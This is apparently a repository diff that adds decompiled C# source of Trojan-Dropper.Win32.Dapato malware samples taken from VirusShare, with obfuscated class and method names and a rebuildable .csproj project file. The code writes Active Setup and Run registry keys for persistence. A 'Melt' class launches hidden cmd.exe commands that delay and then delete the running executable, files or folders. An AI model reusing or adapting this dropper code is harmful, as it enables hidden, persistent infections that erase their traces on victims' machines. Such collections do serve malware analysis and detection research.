// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate bool r(object _param1, object _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/s.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: s
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
internal delegate Type s(RuntimeTypeHandle _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/t.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: t
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Reflection;
internal delegate Assembly t(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/u.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: u
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Reflection;
using System.Resources;
internal delegate ResourceManager u(string _param1, Assembly _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/v.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: v
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Globalization;
internal delegate object v(object _param1, string _param2, CultureInfo _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/w.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: w
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate object w(object _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/x.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: x
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Reflection;
internal delegate Assembly x();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/y.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: y
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.IO;
internal delegate Stream y(object _param1, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/z.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: z
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.IO;
internal delegate BinaryReader z(Stream _param1);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/AssemblyInfo.cs
+10
View File
@@ -0,0 +1,10 @@
using System.Reflection;
[assembly: AssemblyCompany("Company")]
[assembly: AssemblyCopyright("Copyright")]
[assembly: AssemblyDescription("Description")]
[assembly: AssemblyTitle("Title")]
[assembly: AssemblyProduct("Product")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyTrademark("Trademark")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwG.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
internal class HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP
{
public static string dnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBH = Environment.GetEnvironmentVariable("Appdata") + "\\KqJuyYy.exe";
public static string aiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhm = "{ACVPA-33X86-OB8PL-T8BWZ-TT2AE}";
public static void SJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGt() => HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.PFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZ();
public static void PFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZ()
{
try
{
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Active Setup\\Installed Components\\" + HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.aiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhm);
subKey.SetValue("Pfad", (object) HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLP.dnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBH);
subKey.SetValue("IsInstalled", (object) 1, RegistryValueKind.DWord);
subKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/Melt.cs
+87
View File
@@ -0,0 +1,87 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.Melt
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
public class Melt
{
private string _Path;
private string[] _Files;
private Melt._What State;
private int _Time;
public Melt(string Path, int Time = 3000)
{
this._Time = 3000;
this.State = !Path.Contains(".exe") ? Melt._What.Folder : Melt._What.Proccess;
this._Path = Path;
this._Time = Time;
}
public Melt(string[] Files, int Time = 3000)
{
this._Time = 3000;
this._Files = Files;
this._Time = Time;
this.State = Melt._What.Files;
}
public bool Action()
{
bool flag;
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
startInfo.FileName = "cmd.exe";
if (this.State == Melt._What.Files)
{
object Left = (object) ("/C ping 1.1.1.1 -n 1 -w " + this._Time.ToString());
int num = checked (this._Files.Length - 1);
int index = 0;
while (index <= num)
{
Left = Operators.AddObject(Left, (object) (" > Nul & Del " + this._Files[index]));
checked { ++index; }
}
startInfo.Arguments = Conversions.ToString(Left);
Process.Start(startInfo);
}
else if (this.State == Melt._What.Folder)
{
startInfo.Arguments = "/C RMDIR " + this._Path + " /s /q";
Process.Start(startInfo);
}
else if (this.State == Melt._What.Proccess)
{
startInfo.Arguments = "/C ping 1.1.1.1 -n 1 -w " + this._Time.ToString() + " > Nul & Del " + this._Path;
Process.Start(startInfo);
Environment.Exit(0);
}
flag = true;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
}
return flag;
}
public enum _What
{
Proccess,
Folder,
Files,
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/My/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ApplicationBase
{
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/My/MyProject.cs
+108
View File
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[StandardModule]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpP.cs
+77
View File
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
internal class NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq
{
public static void KSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfj(
string name,
string path,
NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg area)
{
switch (area)
{
case NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheCurrentoftheUSER:
try
{
Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
break;
}
case NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdorHcdnwrVkEYqlbHPQOTFxFjvvLPSJixqaILfIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkq.IAHSgioahsgiaoshgiposahg.TheLocalofMachine:
try
{
Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
break;
}
default:
try
{
Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run").SetValue(name, (object) path);
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
break;
}
}
}
public enum IAHSgioahsgiaoshgiposahg
{
TheCurrentoftheUSER,
TheLocalofMachine,
Both,
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/Trojan-Dropper.Win32.Dapato.atdt.csproj
+53
View File
@@ -0,0 +1,53 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>rCWkXKkHG</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="fIMakGTGsTpoRyQCGfGRLdawTrjfrJXsgpNIlnUotCrXggfjHO.cs" />
<Compile Include="gZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIR.cs" />
<Compile Include="dUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTN.cs" />
<Compile Include="HOVzMMbfiayOHqYbvYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwG.cs" />
<Compile Include="NXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpP.cs" />
<Compile Include="aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJ.cs" />
<Compile Include="Melt.cs" />
<Compile Include="My\MyApplication.cs" />
